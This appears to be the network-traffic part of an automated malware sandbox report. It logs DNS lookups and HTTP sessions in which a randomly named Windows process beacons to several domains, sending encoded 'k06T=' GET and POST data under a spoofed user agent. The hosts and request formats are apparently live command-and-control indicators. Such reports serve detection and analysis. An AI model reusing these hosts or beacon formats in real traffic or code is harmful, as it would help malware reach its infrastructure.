                                              Jul 3, 2024 16:39:26.880378008 CEST1.1.1.1192.168.2.50x602aName error (3)www.gospelstudygroup.orgnonenoneA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:39:32.223649979 CEST1.1.1.1192.168.2.50xa06aNo error (0)www.valerieomage.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 3, 2024 16:39:32.223649979 CEST1.1.1.1192.168.2.50xa06aNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:39:47.891410112 CEST1.1.1.1192.168.2.50x4e0bName error (3)www.instantmailer.cloudnonenoneA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:39:55.996679068 CEST1.1.1.1192.168.2.50xaec6No error (0)www.kosherphonestore.comwww.kosherphonestore.com.cdn.hstgr.netCNAME (Canonical name)IN (0x0001)false
                                              Jul 3, 2024 16:39:55.996679068 CEST1.1.1.1192.168.2.50xaec6No error (0)www.kosherphonestore.com.cdn.hstgr.net84.32.84.130A (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:40:09.577852011 CEST1.1.1.1192.168.2.50xbc2cNo error (0)www.cwgehkk.store43.155.26.241A (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:40:43.620145082 CEST1.1.1.1192.168.2.50x873dNo error (0)www.mybodyradar.netmybodyradar.netCNAME (Canonical name)IN (0x0001)false
                                              Jul 3, 2024 16:40:43.620145082 CEST1.1.1.1192.168.2.50x873dNo error (0)mybodyradar.net3.33.130.190A (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:40:43.620145082 CEST1.1.1.1192.168.2.50x873dNo error (0)mybodyradar.net15.197.148.33A (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:40:57.133352041 CEST1.1.1.1192.168.2.50x27b7No error (0)www.lacemalt.top203.161.55.102A (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:41:10.734431028 CEST1.1.1.1192.168.2.50x4640No error (0)www.siteblogoficialon.comsiteblogoficialon.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 3, 2024 16:41:10.734431028 CEST1.1.1.1192.168.2.50x4640No error (0)siteblogoficialon.com108.179.193.98A (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:41:24.251256943 CEST1.1.1.1192.168.2.50xee4eName error (3)www.mcxright.comnonenoneA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:41:32.329464912 CEST1.1.1.1192.168.2.50xcc8dName error (3)www.amkmos.onlinenonenoneA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:41:40.880045891 CEST1.1.1.1192.168.2.50x1b0fNo error (0)www.mg55aa.xyz35.241.34.216A (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:41:54.397344112 CEST1.1.1.1192.168.2.50x831bNo error (0)www.lavillitadepapa.com74.208.46.171A (IP address)IN (0x0001)false
                                              • www.valerieomage.com
                                              • www.kosherphonestore.com
                                              • www.cwgehkk.store
                                              • www.mybodyradar.net
                                              • www.lacemalt.top
                                              • www.siteblogoficialon.com
                                              • www.mg55aa.xyz
                                              • www.lavillitadepapa.com
Session ID: 0, Source IP: 192.168.2.5, Source Port: 49711, Destination IP: 23.227.38.74, Destination Port: 80, PID: 5784, Process: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
Jul 3, 2024 16:39:32.243674994 CEST, 548 bytes, OUT:
GET /c7rq/?k06T=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+smLAouLcyIEijMeq9ccv2ntai0EWGFrkjFC0U/c7k/DTDLA==&rz=LZsl-bkp-XfXeRLp HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.valerieomage.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
Jul 3, 2024 16:39:32.818770885 CEST, 1236 bytes, IN:
HTTP/1.1 301 Moved Permanently
                                              Date: Wed, 03 Jul 2024 14:39:32 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              X-Sorting-Hat-PodId: 223
                                              X-Sorting-Hat-ShopId: 70582403296
                                              X-Storefront-Renderer-Rendered: 1
                                              location: https://valerieomage.com/c7rq?k06T=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+smLAouLcyIEijMeq9ccv2ntai0EWGFrkjFC0U/c7k/DTDLA==&rz=LZsl-bkp-XfXeRLp
                                              x-redirect-reason: https_required
                                              x-frame-options: DENY
                                              content-security-policy: frame-ancestors 'none';
                                              x-shopid: 70582403296
                                              x-shardid: 223
                                              vary: Accept
                                              powered-by: Shopify
                                              server-timing: processing;dur=13;desc="gc:1", db;dur=4, asn;desc="3356", edge;desc="EWR", country;desc="US", pageType;desc="404", servedBy;desc="2ljb", requestID;desc="79e26ac4-b8d2-49b7-aad5-6bf623d40852-1720017572"
                                              x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1
                                              x-request-id: 79e26ac4-b8d2-49b7-aad5-6bf623d40852-1720017572
                                              CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ogqC992MOgu0KctDu5ItZUss6Y1Wn1nUFE1NeXx7EUyBGDRaZRRewDS%2F%2FRzW59Z4tNYSnmrb%2FjBus8kpb2hLorabTggF5AdfDRM9izZQdpWxeyCrICdxTMyt1inWe0auiScoRJ3V"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
Server-Timing: cfRequestDuration;dur=84.999800
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Downlo


Session ID: 1, Source IP: 192.168.2.5, Source Port: 49713, Destination IP: 84.32.84.130, Destination Port: 80, PID: 5784, Process: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
Jul 3, 2024 16:39:56.006809950 CEST, 820 bytes, OUT:
POST /ktbm/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.kosherphonestore.com
                                              Origin: http://www.kosherphonestore.com
                                              Referer: http://www.kosherphonestore.com/ktbm/
                                              Content-Length: 205
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Ascii: k06T=QA6UYFT+ZhbfrKbFkBiYduPo4/VzHkuUipwcS7NLwpUkEQA/R4Om1XDa3C3szvDkvlCoxb3dlyzw2oimM1qPPd2eHc/O1fwtwam/gRqzRVH14mOVOlhFEIRGhehwk8LmOvzpx8ORZXAi5PMwER0Ichlq0PAoNPv+M41FRZx34PU+WFxCzGp1xs0ZRYYP0KNLj6Od3kY=
Jul 3, 2024 16:39:56.471627951 CEST, 1218 bytes, IN:
HTTP/1.1 301 Moved Permanently
                                              Server: hcdn
                                              Date: Wed, 03 Jul 2024 14:39:56 GMT
                                              Content-Type: text/html
                                              Content-Length: 795
                                              Connection: close
                                              location: https://www.kosherphonestore.com/ktbm/
                                              platform: hostinger
                                              content-security-policy: upgrade-insecure-requests
                                              alt-svc: h3=":443"; ma=86400
                                              x-hcdn-request-id: 1519ecb6f9e8e9e6e760b6f956740057-bos-edge1
                                              x-hcdn-cache-status: DYNAMIC
                                              x-hcdn-upstream-rt: 0.002
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID: 2, Source IP: 192.168.2.5, Source Port: 49714, Destination IP: 84.32.84.130, Destination Port: 80, PID: 5784, Process: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
Jul 3, 2024 16:39:58.542188883 CEST, 840 bytes, OUT:
POST /ktbm/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.kosherphonestore.com
                                              Origin: http://www.kosherphonestore.com
                                              Referer: http://www.kosherphonestore.com/ktbm/
                                              Content-Length: 225
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Ascii: k06T=QA6UYFT+ZhbfrqHFniKYMePrkvVzdUuYiu4cS65lwbwkE1k/Q62m43DavS2n3vDvvlOKxb7dlynw2q6mMC+IPN2cL8/M7/wtwam/gRuZRUj15X+VOEgTHIRF3Ohw1sLiOvyOx9jZZSEi5P8wHEALThlswPBGEtSBB7dWZb5wopACTzcopkhdiMYhBLQ4l6si5ZetpzPW5Unsca0b2dXtdrMUACnA
Jul 3, 2024 16:39:59.017893076 CEST, 1218 bytes, IN:
HTTP/1.1 301 Moved Permanently
                                              Server: hcdn
                                              Date: Wed, 03 Jul 2024 14:39:58 GMT
                                              Content-Type: text/html
                                              Content-Length: 795
                                              Connection: close
                                              location: https://www.kosherphonestore.com/ktbm/
                                              platform: hostinger
                                              content-security-policy: upgrade-insecure-requests
                                              alt-svc: h3=":443"; ma=86400
                                              x-hcdn-request-id: 1ee731d08ec6e50cdb3c3817ee9e9ce9-bos-edge1
                                              x-hcdn-cache-status: DYNAMIC
                                              x-hcdn-upstream-rt: 0.001
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID: 3, Source IP: 192.168.2.5, Source Port: 49715, Destination IP: 84.32.84.130, Destination Port: 80, PID: 5784, Process: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
Jul 3, 2024 16:40:01.074760914 CEST, 1857 bytes, OUT:
POST /ktbm/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.kosherphonestore.com
                                              Origin: http://www.kosherphonestore.com
                                              Referer: http://www.kosherphonestore.com/ktbm/
                                              Content-Length: 1241
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 51 41 36 55 59 46 54 2b 5a 68 62 66 72 71 48 46 6e 69 4b 59 4d 65 50 72 6b 76 56 7a 64 55 75 59 69 75 34 63 53 36 35 6c 77 62 34 6b 48 47 63 2f 52 64 61 6d 35 33 44 61 78 43 33 67 33 76 44 49 76 6c 47 4f 78 61 47 2f 6c 78 66 77 33 4c 61 6d 62 48 53 49 57 39 32 63 44 63 2f 42 31 66 77 43 77 61 32 37 67 52 2b 5a 52 55 6a 31 35 56 32 56 49 56 67 54 49 6f 52 47 68 65 68 38 6b 38 4c 4b 4f 76 4c 78 78 39 6d 37 59 6d 77 69 35 72 59 77 49 53 73 4c 61 68 6c 75 38 76 42 6f 45 74 65 67 42 36 78 6b 5a 61 38 6c 6f 75 30 43 51 33 39 68 32 55 35 67 39 76 67 39 48 73 4d 70 7a 38 38 63 77 34 32 74 74 42 79 79 37 58 4c 6d 63 4f 63 74 30 65 36 56 66 38 51 58 45 46 43 59 72 4c 4a 59 32 57 55 33 52 57 59 52 59 50 51 70 67 51 53 34 6d 4e 52 39 67 78 6b 56 72 4c 39 4b 4e 74 4c 49 74 73 4c 56 45 65 36 66 34 6b 7a 43 4d 6e 4a 61 53 43 37 79 4b 72 39 4f 72 47 61 43 54 42 69 49 50 65 6d 5a 41 34 6e 55 4e 61 42 7a 63 46 58 44 6c 6b 33 65 62 4b 61 68 55 73 5a 6c 70 7a 33 50 4c 43 44 66 69 77 66 37 69 54 70 6f 67 [TRUNCATED]
                                              Data Ascii: k06T=[TRUNCATED]
                                              Jul 3, 2024 16:40:01.555587053 CEST | 1218 | IN | HTTP/1.1 301 Moved Permanently
                                              Server: hcdn
                                              Date: Wed, 03 Jul 2024 14:40:01 GMT
                                              Content-Type: text/html
                                              Content-Length: 795
                                              Connection: close
                                              location: https://www.kosherphonestore.com/ktbm/
                                              platform: hostinger
                                              content-security-policy: upgrade-insecure-requests
                                              alt-svc: h3=":443"; ma=86400
                                              x-hcdn-request-id: 0cce8e23151f53ecd70f87c9e8776419-bos-edge1
                                              x-hcdn-cache-status: DYNAMIC
                                              x-hcdn-upstream-rt: 0.000
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              4 | 192.168.2.5 | 49716 | 84.32.84.130 | 80 | 5784 | C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 3, 2024 16:40:03.615106106 CEST | 552 | OUT | GET /ktbm/?k06T=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgBfWJK+jN8eMH36uauFGPXBOtm3yBDVUMLLFQh/MQ7JKdaw==&rz=LZsl-bkp-XfXeRLp HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.kosherphonestore.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Jul 3, 2024 16:40:04.078109026 CEST | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                              Server: hcdn
                                              Date: Wed, 03 Jul 2024 14:40:04 GMT
                                              Content-Type: text/html
                                              Content-Length: 795
                                              Connection: close
                                              location: https://www.kosherphonestore.com/ktbm/?k06T=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgBfWJK+jN8eMH36uauFGPXBOtm3yBDVUMLLFQh/MQ7JKdaw==&rz=LZsl-bkp-XfXeRLp
                                              platform: hostinger
                                              content-security-policy: upgrade-insecure-requests
                                              alt-svc: h3=":443"; ma=86400
                                              x-hcdn-request-id: 60824575b80575562073a24d898237c4-bos-edge1
                                              x-hcdn-cache-status: MISS
                                              x-hcdn-upstream-rt: 0.009
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 styl
                                              Jul 3, 2024 16:40:04.078440905 CEST | 137 | IN | Data Raw: 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20
                                              Data Ascii: e="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              5 | 192.168.2.5 | 49718 | 43.155.26.241 | 80 | 5784 | C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 3, 2024 16:40:09.587575912 CEST | 799 | OUT | POST /kwl6/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.cwgehkk.store
                                              Origin: http://www.cwgehkk.store
                                              Referer: http://www.cwgehkk.store/kwl6/
                                              Content-Length: 205
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 58 34 63 6e 73 31 2b 59 73 37 47 35 33 4f 38 77 56 75 6a 76 47 52 4a 37 34 77 31 66 59 6d 72 70 66 43 78 4a 73 47 53 46 42 38 4c 56 66 72 61 55 4a 45 57 76 50 72 38 6d 38 67 42 61 43 63 44 56 4f 54 64 62 78 38 66 73 42 72 54 6b 69 2f 4f 52 39 68 48 44 63 4d 73 6d 64 4e 63 4c 41 4e 4f 42 65 6b 73 64 51 4f 51 58 6b 64 58 57 55 41 56 4f 7a 78 6e 45 2f 4d 51 79 43 59 4f 72 43 34 43 79 65 78 4d 58 64 64 67 75 6a 36 52 4c 48 72 66 55 6d 4c 48 72 61 66 56 2b 65 2b 4b 66 68 55 2b 52 7a 65 6d 73 44 42 5a 39 5a 55 4f 47 4d 78 56 76 55 61 5a 44 45 63 53 4f 6b 4c 51 69 5a 52 66 4a 6e 65 37 37 50 6e 49 3d
                                              Data Ascii: k06T=X4cns1+Ys7G53O8wVujvGRJ74w1fYmrpfCxJsGSFB8LVfraUJEWvPr8m8gBaCcDVOTdbx8fsBrTki/OR9hHDcMsmdNcLANOBeksdQOQXkdXWUAVOzxnE/MQyCYOrC4CyexMXddguj6RLHrfUmLHrafV+e+KfhU+RzemsDBZ9ZUOGMxVvUaZDEcSOkLQiZRfJne77PnI=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              6 | 192.168.2.5 | 49719 | 43.155.26.241 | 80 | 5784 | C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 3, 2024 16:40:12.120249987 CEST | 819 | OUT | POST /kwl6/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.cwgehkk.store
                                              Origin: http://www.cwgehkk.store
                                              Referer: http://www.cwgehkk.store/kwl6/
                                              Content-Length: 225
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 58 34 63 6e 73 31 2b 59 73 37 47 35 32 75 73 77 51 50 6a 76 52 68 4a 34 33 51 31 66 52 47 71 67 66 43 39 4a 73 43 6a 65 43 4f 76 56 63 4c 71 55 49 42 69 76 4f 72 38 6d 79 41 42 66 47 63 43 62 4f 54 51 37 78 39 7a 73 42 72 33 6b 69 2b 2b 52 38 57 72 41 64 63 73 34 53 74 63 4a 4f 74 4f 42 65 6b 73 64 51 4f 30 74 6b 64 50 57 55 56 64 4f 77 51 6e 44 68 63 52 41 42 59 4f 72 54 6f 43 32 65 78 4d 68 64 63 38 41 6a 2f 56 4c 48 75 37 55 6e 66 54 6f 56 66 56 30 52 65 4c 53 74 6c 50 47 35 73 6d 65 50 79 51 42 47 46 2b 61 4a 48 34 46 4f 34 52 72 58 38 2b 32 30 59 59 56 49 68 2b 67 39 39 72 4c 52 77 63 65 51 69 62 31 6f 42 6f 43 45 50 73 61 6a 33 78 78 4c 71 6e 76
                                              Data Ascii: k06T=X4cns1+Ys7G52uswQPjvRhJ43Q1fRGqgfC9JsCjeCOvVcLqUIBivOr8myABfGcCbOTQ7x9zsBr3ki++R8WrAdcs4StcJOtOBeksdQO0tkdPWUVdOwQnDhcRABYOrToC2exMhdc8Aj/VLHu7UnfToVfV0ReLStlPG5smePyQBGF+aJH4FO4RrX8+20YYVIh+g99rLRwceQib1oBoCEPsaj3xxLqnv


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              7 | 192.168.2.5 | 49720 | 43.155.26.241 | 80 | 5784 | C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 3, 2024 16:40:14.669884920 CEST | 1836 | OUT | POST /kwl6/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.cwgehkk.store
                                              Origin: http://www.cwgehkk.store
                                              Referer: http://www.cwgehkk.store/kwl6/
                                              Content-Length: 1241
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
